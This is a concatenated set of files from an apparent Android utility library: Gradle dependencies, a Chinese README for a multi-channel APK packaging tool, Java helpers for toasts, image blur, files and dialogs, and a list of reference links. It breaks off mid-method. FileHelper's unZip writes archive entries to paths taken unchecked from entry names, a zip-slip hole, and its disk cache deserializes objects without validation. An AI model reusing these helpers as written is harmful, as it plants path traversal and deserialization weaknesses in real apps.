// compile 'com.github.edanel:GBSlideBar:0.5' // slider picker
// compile 'me.codeboy.android:align-text-view:2.3.0' // text layout
// compile 'de.hdodenhof:circleimageview:2.0.0' // circular image view
// compile 'com.github.badoualy:morphy-toolbar:1.0.3' // collapsing Toolbar
// compile 'com.github.alorma:timelineview:2.2.1' // timeline view
// Video
// compile 'com.asha:vrlib:0.1' // panoramic video
// compile 'com.github.danylovolokh:video-player-manager:0.2.0' // play on scroll focus
// compile 'com.github.danylovolokh:list-visibility-utils:0.2.0' // play on scroll focus
// compile 'com.github.eneim:Toro:1.1.0' // play on scroll focus
// Material Design
// compile 'com.redbooth:SlidingDeck:1.0.0' // stacked cards
// compile 'com.github.DxTT:coolMenu:v1.2' // card view switching
// compile 'com.jaredrummler:material-spinner:1.0.4' // Spinner
debugCompile 'com.squareup.leakcanary:leakcanary-android:1.3'
releaseCompile 'com.squareup.leakcanary:leakcanary-android-no-op:1.3'
// Jars
// compile files('lib/mpermissions.jar') // usage: http://www.cnblogs.com/avenwu/p/4173899.html
compile files('lib/android-directionalviewpager-1.2.1fixed.jar')
}
<file_sep>AndroidMultiChannelBuildTool
============================
安卓多渠道打包工具。
实现思路讲解: [Android批量打包提速 - GavinCT](http://www.cnblogs.com/ct2011/p/4152323.html)
使用本工具,Android程序员仅需将ChannelUtil.java放入到工程里使用,以后打包的事情就不用自己动手了。
安装个Python环境,运行一下MultiChannelBuildTool.py,谁都可以打包了!
# 具体使用步骤
将想要批量打包的apk文件拷贝到PythonTool目录下(与py同级),运行py脚本即可打包完成。(生成的渠道apk包在output_** 目录下)
# 目录介绍及使用注意
## PythonTool
Python2 与 Python3 都能正常使用
- info目录下的channel用来存放渠道,多个渠道之间用换行隔开。
注意:
fork后通过Github clone,这个channel文件在Windows端是正常的,以换行隔开(`\r\n`)。
直接点击右侧的download下载zip,可能你在windows端看到的就不是以换行隔开的(`\n`)。
这是Github造成的。但不会影响程序最后的运行效果。
你可以粘贴下面的渠道到channel.txt中保持它在windows端的可读性。
```
samsungapps
hiapk
anzhi
360cn
xiaomi
myapp
91com
gfan
appchina
nduoa
3gcn
mumayi
10086com
wostore
189store
lenovomm
hicloud
meizu
baidu
googleplay
wandou
```
也可以自己来写入自己需要的市场,并以换行隔开
- MultiChannelBuildTool.py是多渠道打包的脚本。
## JavaUtil
ChannelUtil.java 用来解析渠道,直接拷贝到Android工程中使用即可。
ChannelUtil中的getChannel方法可以方便的获取渠道。
# 常见问题答疑
这部分问题是由美团大神<a href="http://weibo.com/coderdd" target="_blank" >丁志虎</a>在微博上答复的,摘录如下:
- 这个方案没法解决不同渠道使用渠道自己SDK的问题,友盟的SDK提供了在代码中设置渠道的方式,所以在获取到渠道号后再调用SDK相关设置渠道的方法就可以了
- apk用的是java那一套签名,放在META-INF文件夹里的文件原则上是不参与签名的。如果Google修改了apk的签名规则,这一套可能就不适用了。
# License
Copyright 2014 GavinCT
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
<file_sep>package com.icenler.lib.utils.manager;
import android.content.Context;
import android.os.Handler;
import android.view.View;
import android.widget.ImageView;
import android.widget.TextView;
import android.widget.Toast;
import com.icenler.lib.R;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
/**
 * Created by iCenler - 2015/7/14.
 * Description: app-wide custom Toast helper.
 * 1. Can show for a fixed duration or indefinitely (cancel via {@link #cancel()}).
 */
public class ToastManager {

    private static final int DEF_NO_ICON = 0;
    private static final int DEF_FAILED_ICON = DEF_NO_ICON;
    private static final int DEF_SUCCESS_ICON = DEF_NO_ICON;

    // Visibility flag is only maintained for the "always"/timed modes driven through mToast.
    private static boolean isShowing = false;
    private static Toast mToast;

    private ToastManager() {
        throw new UnsupportedOperationException("cannot be instantiated");
    }

    /**
     * Shows a plain short toast.
     *
     * @param context context used to build the toast
     * @param msg     message text
     */
    public static void show(Context context, String msg) {
        show(context, DEF_NO_ICON, msg);
    }

    public static void show(Context context, int strRes) {
        show(context, context.getString(strRes));
    }

    /**
     * Shows a toast with a success/failure icon.
     *
     * @param isError true to use the failure icon, false for the success icon
     */
    public static void show(Context context, boolean isError, String msg) {
        show(context, isError ? DEF_FAILED_ICON : DEF_SUCCESS_ICON, msg);
    }

    public static void show(Context context, boolean isError, int strRes) {
        show(context, isError, context.getString(strRes));
    }

    /**
     * Shows a toast with an arbitrary icon resource.
     *
     * @param iconRes icon drawable resource, or DEF_NO_ICON for none
     */
    public static void show(Context context, int iconRes, String msg) {
        Toast toast = new Toast(context);
        toast.setView(getToastView(context, iconRes, msg));
        toast.setDuration(Toast.LENGTH_SHORT);
        toast.show();
    }

    public static void show(Context context, int iconRes, int strRes) {
        // BUG FIX: this overload previously called itself (show(context, iconRes, strRes)),
        // an infinite recursion ending in StackOverflowError. Resolve the string resource
        // so the (Context, int, String) overload is selected.
        show(context, iconRes, context.getString(strRes));
    }

    /**
     * @return the inflated custom toast layout with message set and icon shown or hidden
     */
    private static View getToastView(Context context, int iconRes, String msg) {
        View view = View.inflate(context, R.layout.toast_layout, null);
        ((TextView) view.findViewById(R.id.toast_message)).setText(msg);
        if (iconRes != DEF_NO_ICON) {
            ((ImageView) view.findViewById(R.id.toast_icon)).setImageResource(iconRes);
        } else {
            view.findViewById(R.id.toast_icon).setVisibility(View.GONE);
        }
        return view;
    }

    /**
     * Shows a toast indefinitely, until {@link #cancel()} is called. Implemented by
     * reflectively driving Toast's internal "mTN" handler so the system never hides it.
     */
    public static void showAlways(Context context, String message) {
        if (isShow()) mToast.cancel();

        Field mTNField = null;
        try {
            mTNField = Toast.class.getDeclaredField("mTN");
            mTNField.setAccessible(true);
            Object mTN = mTNField.get(mToast = new Toast(context));
            try {
                // Android 4.0+ requires mTN.mNextView to be populated before show().
                Field mNextViewField = mTN.getClass().getDeclaredField("mNextView");
                mNextViewField.setAccessible(true);
                mNextViewField.set(mTN, getToastView(context, DEF_NO_ICON, message));
            } catch (NoSuchFieldException e) {
                e.printStackTrace();
            }

            Method showMethod = mTN.getClass().getDeclaredMethod("show", new Class[]{});
            showMethod.setAccessible(true);
            showMethod.invoke(mTN, new Object[]{});
            isShowing = true;
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void showAlways(Context context, int strRes) {
        // BUG FIX: previously recursed into itself; resolve the resource first so the
        // (Context, String) overload is selected.
        showAlways(context, context.getString(strRes));
    }

    /**
     * Shows a toast for exactly {@code delayMillis} milliseconds.
     */
    public static void show(Context context, String message, long delayMillis) {
        showAlways(context, message);
        new Handler().postDelayed(new Runnable() {
            @Override
            public void run() {
                cancel();
            }
        }, delayMillis);
    }

    public static void show(Context context, int strRes, long delayMillis) {
        // BUG FIX: previously recursed into itself; resolve the resource first so the
        // (Context, String, long) overload is selected.
        show(context, context.getString(strRes), delayMillis);
    }

    /** Cancels the always/timed toast, if visible. */
    public static void cancel() {
        if (mToast != null && isShow()) {
            mToast.cancel();
            isShowing = false;
        }
    }

    /**
     * @return whether the always/timed toast is currently visible
     */
    public static boolean isShow() {
        return isShowing;
    }
}
<file_sep>package com.icenler.lib.utils;
import android.content.Context;
import android.graphics.Bitmap;
import android.os.AsyncTask;
import android.view.View;
import android.widget.ImageView;
import com.nostra13.universalimageloader.core.ImageLoader;
import com.nostra13.universalimageloader.core.assist.FailReason;
import com.nostra13.universalimageloader.core.listener.ImageLoadingListener;
/**
 * Created by iCenler - 2015/9/11:
 * Description: image filter loading helpers.
 * 1. Gaussian blur
 * 2. ...
 */
public class ImageFilterLoaderUtil {

    /**
     * Loads the image at {@code url} into {@code imageView} and, once the bitmap
     * arrives, swaps in a blurred copy. TODO: still to be finished and tested
     * (as in the original); the blur radius passed here is 0.
     */
    public static void loadingImage(final Context context, final ImageView imageView, String url) {
        ImageLoader.getInstance().displayImage(url, imageView, new ImageLoadingListener() {
            @Override
            public void onLoadingStarted(String imageUri, View view) {
                // no-op
            }

            @Override
            public void onLoadingFailed(String imageUri, View view, FailReason failReason) {
                // no-op
            }

            @Override
            public void onLoadingComplete(String imageUri, View view, Bitmap loadedImage) {
                imageView.setImageBitmap(ImageUtil.blurBitmap(context, loadedImage, 0));
            }

            @Override
            public void onLoadingCancelled(String imageUri, View view) {
                // no-op
            }
        });
    }

    /**
     * Background task that blurs a bitmap off the UI thread and applies the result.
     * NOTE(review): currently not referenced by loadingImage, and the imageUri
     * constructor argument is unused — kept for signature compatibility.
     */
    static class BlurAsyncTask extends AsyncTask<Bitmap, Void, Bitmap> {

        private final Context appContext;
        private final ImageView targetView;
        private final float blurRadius;

        public BlurAsyncTask(String imageUri, ImageView imageView, Context context, float radius) {
            this.appContext = context;
            this.targetView = imageView;
            this.blurRadius = radius;
        }

        @Override
        protected Bitmap doInBackground(Bitmap... loadedImage) {
            return ImageUtil.blurBitmap(appContext, loadedImage[0], blurRadius);
        }

        @Override
        protected void onPostExecute(Bitmap bitmap) {
            targetView.setImageBitmap(bitmap);
        }
    }
}
<file_sep>package com.icenler.lib.feature.mvp.base;
/**
 * Marker base interface for MVP views; feature-specific view contracts extend it.
 */
public interface BaseView {
}
<file_sep>package com.icenler.lib.utils;
import android.os.Environment;
import android.support.annotation.NonNull;
import android.text.TextUtils;
import com.icenler.lib.feature.App;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.Closeable;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.zip.Adler32;
import java.util.zip.CheckedInputStream;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import static com.icenler.lib.utils.Preconditions.checkNotNull;
/**
* Created by Cenler on 2015/11/3.
* Description:
*/
public class FileHelper {
private FileHelper() {
throw new UnsupportedOperationException("cannot be instantiated");
}
public static int DEFAULT_BUFFER_SIZE = 8192;
/**
* 递归删除文件及文件夹
*
* @param file
*/
public static boolean deleteAll(File file) {
if (file.isDirectory()) {
File[] childFiles = file.listFiles();
if (childFiles != null && childFiles.length > 0) {
for (int i = 0; i < childFiles.length; i++) {
deleteAll(childFiles[i]);
}
}
}
return file.delete();
}
/**
* @param originPath
* @param targetPath
* @return 解压文件
*/
public static boolean unZip(@NonNull String originPath, @NonNull String targetPath) {
checkNotNull(originPath);
return unZip(new File(originPath), targetPath);
}
public static boolean unZip(@NonNull File originFile, @NonNull String targetPath) {
checkNotNull(originFile);
try {
return unZip(new FileInputStream(originFile), targetPath);
} catch (FileNotFoundException e) {
LogUtil.e("Origin file not found: " + originFile.getAbsolutePath(), e);
return false;
}
}
public static boolean unZip(@NonNull InputStream originInputStream, @NonNull String targetPath) {
checkNotNull(originInputStream);
checkNotNull(targetPath);
CheckedInputStream checkedInputStream = new CheckedInputStream(originInputStream, new Adler32());
BufferedInputStream bufferedInputStream = new BufferedInputStream(checkedInputStream);
ZipInputStream zipInputStream = new ZipInputStream(bufferedInputStream);
byte[] buffer = new byte[DEFAULT_BUFFER_SIZE];
int length;
ZipEntry zipEntry;
try {
while ((zipEntry = zipInputStream.getNextEntry()) != null) {
File targetFile = new File(targetPath, zipEntry.getName());
LogUtil.d(targetFile.getAbsolutePath());
if (zipEntry.isDirectory()) {
targetFile.mkdirs();
} else {
File parentFile = targetFile.getParentFile();
if (!parentFile.exists()) {
parentFile.mkdirs();
}
FileOutputStream fos = null;
BufferedOutputStream bos = null;
try {
fos = new FileOutputStream(targetFile);
bos = new BufferedOutputStream(fos, buffer.length * 4);
while ((length = zipInputStream.read(buffer)) > 0) {
bos.write(buffer, 0, length);
}
bos.flush();
} catch (IOException e) {
LogUtil.e("unzip file fail", e);
} finally {
closeQuietly(bos);
closeQuietly(fos);
}
}
}
LogUtil.i("unzip file success. Checksum: " + checkedInputStream.getChecksum().getValue());
return true;
} catch (IOException e) {
LogUtil.e("unzip file damaged", e);
return false;
} finally {
closeQuietly(zipInputStream);
closeQuietly(bufferedInputStream);
closeQuietly(checkedInputStream);
closeQuietly(originInputStream);
}
}
/**
* 序列化文件对象读取
*
* @param targetPath
* @param fileName
* @return
*/
public static <T extends Object> T readObjectForDiskCache(String targetPath, String fileName) {
if (TextUtils.isEmpty(targetPath) || TextUtils.isEmpty(fileName))
return null;
Object obj = null;
File cacheFile;
FileInputStream fis = null;
ObjectInputStream ois = null;
try {
cacheFile = new File(targetPath, fileName);
fis = new FileInputStream(cacheFile);
ois = new ObjectInputStream(fis);
obj = ois.readObject();
} catch (Exception e) {
LogUtil.e("Error: ", e);
} finally {
closeQuietly(ois);
closeQuietly(fis);
}
return (T) obj;
}
/**
* 序列化对象文件存储
*
* @param targetPath
* @param fileName
* @param object
*/
public static boolean writeObjectForDiskCache(String targetPath, String fileName, Serializable object) {
if (TextUtils.isEmpty(targetPath) || TextUtils.isEmpty(fileName))
return false;
File targetDir;
File cacheFile;
FileOutputStream fos = null;
ObjectOutputStream oos = null;
try {
targetDir = new File(targetPath);
if (!targetDir.exists())
targetDir.mkdirs();
cacheFile = new File(targetDir, fileName);
// 若文件存在则删除
if (!cacheFile.createNewFile())
cacheFile.delete();
fos = new FileOutputStream(cacheFile);
oos = new ObjectOutputStream(fos);
oos.writeObject(object);
oos.flush();
return true;
} catch (IOException e) {
LogUtil.e("write object failed", e);
return false;
} finally {
closeQuietly(oos);
closeQuietly(fos);
}
}
/**
* 目录 or 文件复制
*
* @param originPath 来源目录
* @param targetPath 目标目录
*/
public static void copyFile(String originPath, String targetPath) {
if (TextUtils.isEmpty(originPath) || TextUtils.isEmpty(targetPath))
return;
File origin = new File(originPath);
File target = new File(targetPath);
if (!target.exists())
target.mkdirs();
if (origin.isDirectory()) {
// 目录操作
LogUtil.d("Copy folder"
+ " origin:" + originPath
+ " target:" + targetPath);
String[] fileList = origin.list();
for (int i = 0; i < fileList.length; i++) {
String childName = fileList[i];
String folderName = origin.getName();
copyFile(TextUtils.concat(originPath, File.separator, childName).toString()
, TextUtils.concat(targetPath, File.separator, folderName).toString());
}
} else {
// 文件操作
if (target.isDirectory() && target.canWrite()) {
byte[] buffer = new byte[DEFAULT_BUFFER_SIZE];
int length;
String filename = origin.getName();
FileInputStream fis = null;
FileOutputStream fos = null;
BufferedInputStream bis = null;
BufferedOutputStream bos = null;
try {
fis = new FileInputStream(originPath);
fos = new FileOutputStream(new File(targetPath, filename));
bis = new BufferedInputStream(fis);
bos = new BufferedOutputStream(fos);
while ((length = bis.read(buffer)) > 0) {
bos.write(buffer, 0, length);
}
bos.flush();
LogUtil.d("Copy file success"
+ " origin:" + originPath
+ " target:" + targetPath);
} catch (IOException e) {
LogUtil.e("Copy error:", e);
} finally {
closeQuietly(bos);
closeQuietly(bis);
closeQuietly(fos);
closeQuietly(fis);
}
}
}
}
/**
* 目录 or 文件删除
*
* @param targetPath
*/
public static void deleteFile(String targetPath) {
if (TextUtils.isEmpty(targetPath))
return;
File file = new File(targetPath);
if (file.exists()) {
if (file.isDirectory()) {
File[] files = file.listFiles();
if (file != null && files.length != 0) {
for (File f : files) {
deleteFile(f.getAbsolutePath());
}
}
}
file.delete();
LogUtil.d("Delete file:" + targetPath);
}
}
/**
* @param path 文件下载路径 or 文件路径
* @return 文件名称
*/
public static String getFileName(String path) {
if (TextUtils.isEmpty(path))
return null;
return path.substring(path.lastIndexOf(File.separator) + 1, path.length());
}
/**
* @param type {@link android.os.Environment#DIRECTORY_MUSIC},
* {@link android.os.Environment#DIRECTORY_PODCASTS},
* {@link android.os.Environment#DIRECTORY_RINGTONES},
* {@link android.os.Environment#DIRECTORY_ALARMS},
* {@link android.os.Environment#DIRECTORY_NOTIFICATIONS},
* {@link android.os.Environment#DIRECTORY_PICTURES},
* {@link android.os.Environment#DIRECTORY_MOVIES}
* @return 获取应用缓存目录
*/
public static String getFilesDirectory(String type) {
return getAppStorageDirectory(type);
}
public static String getCacheDirectory() {
return getAppStorageDirectory("cache");
}
private static String getAppStorageDirectory(String dirName) {
if (isSDCardEnable()) {
File file = App.getInstance().getExternalFilesDir(dirName);
if (null == file) {
// 特殊情况下为 null 处理
String cacheDir = TextUtils.concat(
Environment.getExternalStorageDirectory().getPath(), File.separator
, "Android", File.separator
, "data", File.separator
, App.getInstance().getPackageName(), File.separator
, dirName, File.separator).toString();
file = new File(cacheDir);
file.mkdirs();
}
return file.getAbsolutePath();
} else {
return dirName == null ?
App.getInstance().getFileStreamPath(dirName).getAbsolutePath() :
App.getInstance().getFilesDir().getAbsolutePath();
}
}
/**
* @return 判断SDCard是否可用
*/
public static boolean isSDCardEnable() {
return Environment.getExternalStorageState().equals(Environment.MEDIA_MOUNTED);
}
/**
 * Closes the given resource, suppressing any IOException.
 * Intentionally best-effort: a failure to close is ignored.
 *
 * @param closeable resource to close; may be null
 */
public static void closeQuietly(Closeable closeable) {
    if (closeable == null) {
        return;
    }
    try {
        closeable.close();
    } catch (IOException ignored) {
        // deliberately swallowed: nothing useful to do when close() fails
    }
}
}
<file_sep>/****************************************************************/
》 阅读:
- http://blog.csdn.net/singwhatiwanna/article/details/49560409
》 图形字体库:
Font Awesome:
- http://www.bootcss.com/p/font-awesome/#icons-new
- https://github.com/liltof/font-awsome-for-android
》 优秀开源资源学习借鉴:
- https://github.com/Trinea/android-open-project // 开源库整理
- https://github.com/zxing/zxing // 二维码扫描
- http://repo1.maven.org/maven2/com/google/zxing/
- https://github.com/sungerk/CircularMenu // 圆形菜单
- https://github.com/hdodenhof/CircleImageView // 圆形图片
- http://www.imooc.com/view/223 // 推送服务
- https://github.com/alorma/TimelineView // 时间轴
- https://github.com/code-mc/material-icon-lib // 文本图片
- http://blog.csdn.net/xu_fu/article/details/44004841 // SVG Drawable
- http://www.jianshu.com/p/167fd5f47d5c // 无权限弹窗
- https://github.com/liaohuqiu/android-UCToast
- https://github.com/Aspsine/MultiThreadDownload // 多线程下载
- https://github.com/AigeStudio/MultiThreadDownloader
- http://blog.csdn.net/zhaokaiqiang1992/article/details/43939279
- https://github.com/ssseasonnn/RxDownload
- https://git.oschina.net/hailongqiu/AndroidTVWidget/wikis/AndroidTVWidget-use-manual // TV 开发框架
- https://git.oschina.net/hailongqiu/AndroidTVWidget/wikis/Android-TV-%E5%A6%82%E4%BD%95%E4%BD%BF%E7%94%A8%E9%94%AE%E7%9B%98%E6%8E%A7%E4%BB%B6%28SkbContainer%29
- https://git.oschina.net/hailongqiu/AndroidTVWidget/wikis/AndroidTVWidget-use-manual%28Android-Studio%29
- http://www.jcodecraeer.com/a/anzhuokaifa/androidkaifa/2016/0317/4059.html
- https://github.com/DevLight-Mobile-Agency/NavigationTabBar// 自定义TabBar
- https://github.com/sephiroth74/Material-BottomNavigation
- https://github.com/armcha/LuseenBottomNavigation
- https://github.com/saiff35/LivingTabs
- https://github.com/aurelhubert/ahbottomnavigation
- https://github.com/armcha/Space-Navigation-View
- https://github.com/borjabravo10/ReadMoreTextView // 折叠与展示文本控件
- https://github.com/freecats/TextViewExpandableAnimation // 文本折叠展开
- https://github.com/cachapa/ExpandableLayout // 折叠布局
- https://github.com/traex/ExpandableLayout
- https://github.com/zaihuishou/ExpandableRecyclerview
- https://github.com/kakajika/FragmentAnimations // Fragment 切换动画
- https://github.com/waynell/VideoListPlayer // 视频滑动播放
- https://github.com/supercwn/SuperPlayer // 视频播放器
- https://github.com/alphamu/AnimatedEditText // 输入文本动画
- http://www.jcodecraeer.com/a/opensource/2016/0510/4252.html // 气泡消息框
- http://www.jcodecraeer.com/a/opensource/2016/0509/4232.html // 自适应提示框
- http://www.jcodecraeer.com/a/opensource/2016/0510/4250.html // 仿 ISO 卡片视图
- https://github.com/Diolor/Swipecards
- https://github.com/prolificinteractive/swipe-action-layout // 防 ISO 下拉状态操作
- https://github.com/ashqal/ChromeLikeSwipeLayout
- https://github.com/klinker41/android-slidingactivity // 下拉返回
- http://www.jcodecraeer.com/a/anzhuokaifa/androidkaifa/2016/0527/4302.html // WebP 图片
- https://github.com/Curzibn/Luban // 图片压缩
- https://github.com/oubowu/MarqueeLayoutLibrary // 自动混动视图
- https://github.com/venshine/GoodView // 点赞收藏特效
- https://github.com/UFreedom/FloatingText
- https://github.com/jd-alexander/LikeButton
- https://github.com/hanks-zyh/SmallBang
- http://www.jcodecraeer.com/a/opensource/2015/1224/3798.html
- https://github.com/ldoublem/LoadingView // 自定义Loading参考
- https://github.com/Rogero0o/CatLoadingView
- https://github.com/Ajian-studio/GAHonorClock
- https://github.com/Ajian-studio/GALeafLoading
- https://github.com/Ajian-studio/GABottleLoading
- https://github.com/Ajian-studio/GADownloading
- https://github.com/sfsheng0322/StickyHeaderListView // 筛选布局封装
- https://github.com/baiiu/DropDownMenu
- https://github.com/sungerk/DropDownLayout
- https://github.com/dongjunkun/DropDownMenu
- https://github.com/wuapnjie/PoiPhoto // 图片选择器
- https://github.com/pengjianbo/GalleryFinal
- https://github.com/crosswall/Android-PickPhotos
- https://github.com/sangcomz/FishBun
- https://github.com/TangXiaoLv/TelegramGallery
- https://github.com/BmobSnail/PhotoUploadView
- https://github.com/LuckSiege/PictureSelector
- https://github.com/zaaach/CityPicker // 城市列表定位
- https://github.com/androiddevelop/AlignTextView // 文本对齐
- https://github.com/andyxialm/SmoothCheckBox // CheckBox 动效
- https://github.com/wenmingvs/NotifyUtil // 消息通知
- https://github.com/whilu/AndroidTagView // Label 布局
- https://github.com/H07000223/FlycoLabelView
- https://github.com/yll2wcf/YLListView // 下拉视差动效
- https://github.com/EverythingMe/overscroll-decor // 阻尼回弹效果
- https://github.com/Narfss/ParallaxEverywhere // 滑动视差展示
- https://github.com/Frank-Zhu/PullZoomView
- https://github.com/kanytu/android-parallax-recyclerview
- https://github.com/z56402344/AnimTextView // 数字落入动效
- https://github.com/robinhood/ticker
- https://github.com/xujinyang/BiuEditText // 输入法动效
- https://github.com/alphamu/AnimatedEditText
- https://github.com/glomadrian/material-code-input
- https://github.com/florent37/MaterialTextField // 输入框交互
// 转场动画
- https://github.com/hehonghui/android-tech-frontier/tree/master/others/%E6%B7%B1%E5%85%A5%E6%B5%85%E5%87%BAAndroid%20%E6%96%B0%E7%89%B9%E6%80%A7-Transition-Part-1
- http://www.jcodecraeer.com/a/anzhuokaifa/androidkaifa/2016/0711/4490.html
- https://github.com/Y-bao/PullRefreshView // 刷新加载
- https://github.com/dinuscxj/RecyclerRefreshLayout
- https://github.com/eoinfogarty/Onboarding // 引导页
- https://github.com/zuiwuyuan/WeChatPswKeyboard // 数字密码输入
- https://github.com/mychoices/Jgraph // 图表引擎
- https://github.com/qifengdeqingchen/SeatTable // 电影-选座购票
- https://github.com/ldoublem/FlightSeat // 飞机
- https://github.com/timehop/sticky-headers-recyclerview // 悬浮指示器
- https://github.com/oubowu/PinnedSectionItemDecoration/tree/master
- https://github.com/hackware1993/MagicIndicator
- https://github.com/huazhiyuan2008/RecyclerViewCardGallery // 画廊替换方案
- https://github.com/rubensousa/RecyclerViewSnap // V7 SnapHelper
- https://github.com/jinatonic/confetti // 粒子动画
- https://github.com/yipianfengye/android-adDialog // 广告弹窗
- https://github.com/pedant/sweet-alert-dialog // 提示弹窗
- http://www.jcodecraeer.com/a/anzhuokaifa/androidkaifa/2016/0830/6578.html // 开源项目进阶
- https://github.com/ryanhoo/StylishMusicPlayer // 音乐播放器
- https://github.com/Chacojack/HiveLayoutManager // RecyclerViewManager 蜂窝布局
- https://github.com/kHRYSTAL/CircleRecyclerView // 弧形布局
- https://github.com/mcxtzhang/ZLayoutManager // 卡片层叠视图
- https://github.com/RomainPiel/Shimmer-android // 闪烁控件
- https://github.com/facebook/shimmer-android
- https://github.com/daimajia/AndroidImageSlider // ViewPager 切换动画
- https://github.com/ToxicBakery/ViewPagerTransforms
- https://github.com/xgc1986/ParallaxPagerTransformer
- https://github.com/fccaikai/AutoScrollViewPager // 轮播图
- https://github.com/ozodrukh/CircularReveal // 点击波纹
- https://github.com/traex/RippleEffect
- https://github.com/HomHomLin/SlidingLayout // WebView 版权下拉展示
- https://github.com/xmuSistone/android-page-transition // 卡片画廊
- https://github.com/dongjunkun/CouponView // 优惠券组件
- https://github.com/sfsheng0322/MarqueeView // 公告栏组件
- https://github.com/Bilibili/DanmakuFlameMaster/issues // 弹幕框架
- https://github.com/laobie/NineGridImageView // 九宫格图片适配
- https://github.com/panyiho/NineGridView
- https://github.com/w4lle/NineGridView
- https://github.com/KevinMbg/NineImageViews
- https://github.com/jeasonlzy/NineGridView
- https://github.com/chrisbanes/PhotoView
- https://github.com/githubwing/DragPhotoView // 照片预览滑动退出
- https://github.com/zhengken/LyricViewDemo // 歌词同步
- https://github.com/codbking/CalendarExaple // 日历组件
- https://github.com/YoKeyword/Fragmentation // Fragments 框架
》 Intent 整理:
- http://blog.csdn.net/playboyanta123/article/details/7913679
》 蓝牙开发:
- http://www.jcodecraeer.com/a/anzhuokaifa/androidkaifa/2016/0128/3918.html
》 待办事项
- http://blog.csdn.net/sinyu890807/article/list/1
- http://www.apkbus.com/forum.php?mod=viewthread&tid=247787
- http://www.apkbus.com/forum.php?mod=viewthread&tid=247783
http://www.jianshu.com/p/e711e22e053e
http://www.jianshu.com/p/03fdcfd3ae9c
http://blog.csdn.net/guolin_blog?viewmode=contents
- 热补丁框架
- https://github.com/alibaba/dexposed
- https://github.com/alibaba/AndFix
- https://github.com/Tencent/tinker
- http://bugly.qq.com/blog/?p=781
CardView android:foreground="?attr/selectableItemBackground" Ripple
<?xml version="1.0" encoding="utf-8"?>
<selector xmlns:android="http://schemas.android.com/apk/res/android">
<item android:state_enabled="true" android:state_pressed="true">
<objectAnimator
android:duration="@android:integer/config_shortAnimTime"
android:propertyName="translationZ"
android:valueTo="@dimen/touch_raise"
android:valueType="floatType" />
</item>
<item>
<objectAnimator
android:duration="@android:integer/config_shortAnimTime"
android:propertyName="translationZ"
android:valueTo="0dp"
android:valueType="floatType" />
</item>
</selector>
android:stateListAnimator="@anim/touch_raise"<file_sep>package com.icenler.lib.view.dialog;
import android.app.DialogFragment;
import android.app.FragmentManager;
/**
 * Created by iCenler - 2015/9/13:
 * Description: helper that shows/hides a single shared loading DialogFragment.
 * Only one dialog instance is tracked at a time via a static reference.
 */
public class SimpleProgressDialog {

    private static DialogFragment mDialog;

    public static DialogFragment getDialog() {
        return mDialog;
    }

    /**
     * Shows the loading dialog unless one is already visible.
     * Any failure leaves the tracked reference cleared.
     */
    public static void show(FragmentManager fm) {
        try {
            if (mDialog != null && mDialog.isVisible()) {
                return; // already showing — nothing to do
            }
            mDialog = CustomLoadingView.createDialog();
            mDialog.show(fm, "Simple_Loading_Dialog");
        } catch (Exception e) {
            mDialog = null;
        }
    }

    /**
     * Dismisses the loading dialog if present and clears the tracked reference.
     */
    public static void dismiss() {
        try {
            DialogFragment dialog = mDialog;
            if (dialog != null) {
                dialog.dismiss();
            }
        } catch (Exception e) {
            // ignored: the reference is cleared below either way
        } finally {
            mDialog = null;
        }
    }
}
<file_sep>package com.icenler.lib.feature.base;
import android.app.Dialog;
import android.content.DialogInterface;
import android.os.Bundle;
import android.support.annotation.LayoutRes;
import android.support.v4.app.DialogFragment;
import android.view.Gravity;
import android.view.LayoutInflater;
import android.view.View;
import android.view.Window;
import android.view.WindowManager;
import com.icenler.lib.R;
/**
 * Description: base dialog component for the app; subclass and override the hooks
 * below to configure:
 * 1. dialog theme                         getDialogTheme()
 * 2. auto-dismiss (default yes)           isCancelable()
 * 3. dismiss on outside touch (default yes) isCanceledOnTouchOutside()
 * 4. window position (default centered)   getGravity() (ref: Gravity)
 * 5. window type (ref: WindowManager.LayoutParams.TYPE_xxx)
 * 6. window width (default wrap_content)
 * 7. window height (default wrap_content)
 */
public abstract class BaseDialogFragment extends DialogFragment {

    /** Layout resource inflated as the dialog's content view. */
    @LayoutRes
    protected abstract int doGetLayoutResId();

    /** Bind views of the inflated content here; called from onCreateDialog(). */
    protected abstract void doInit(View root);

    /** Optional data-initialisation hook, called from onActivityCreated(). */
    protected void doInitData() {
    }

    public void setOnDismissListener(DialogInterface.OnDismissListener onDialogDismissListener) {
        this.mDismissListener = onDialogDismissListener;
    }

    // Forwarded from both onDismiss() and onCancel().
    private DialogInterface.OnDismissListener mDismissListener;

    @Override
    public Dialog onCreateDialog(Bundle savedInstanceState) {
        Dialog dialog = new Dialog(getActivity(), getDialogTheme());
        View root = LayoutInflater.from(getActivity()).inflate(doGetLayoutResId(), null);
        dialog.setCancelable(isCancelable());
        dialog.setCanceledOnTouchOutside(isCanceledOnTouchOutside());
        dialog.setContentView(root);
        // Apply size / gravity / type to the dialog window before returning it.
        Window window = dialog.getWindow();
        WindowManager.LayoutParams layoutParams = window.getAttributes();
        layoutParams.width = getDefaultWidth();
        layoutParams.height = getDefaultHeight();
        window.setGravity(getGravity());
        window.setAttributes(layoutParams);
        window.setType(getWindowType());
        // window.setSoftInputMode(WindowManager.LayoutParams.SOFT_INPUT_STATE_HIDDEN);
        doInit(root);
        return dialog;
    }

    @Override
    public void onActivityCreated(Bundle savedInstanceState) {
        super.onActivityCreated(savedInstanceState);
        doInitData();
    }

    /**
     * Dialog theme resource.
     */
    protected int getDialogTheme() {
        return R.style.BaseDialog;
    }

    /**
     * Whether touching outside the window dismisses the dialog.
     */
    protected boolean isCanceledOnTouchOutside() {
        return true;
    }

    /**
     * Window gravity (position on screen).
     */
    protected int getGravity() {
        return Gravity.CENTER;
    }

    /**
     * Window type.
     */
    protected int getWindowType() {
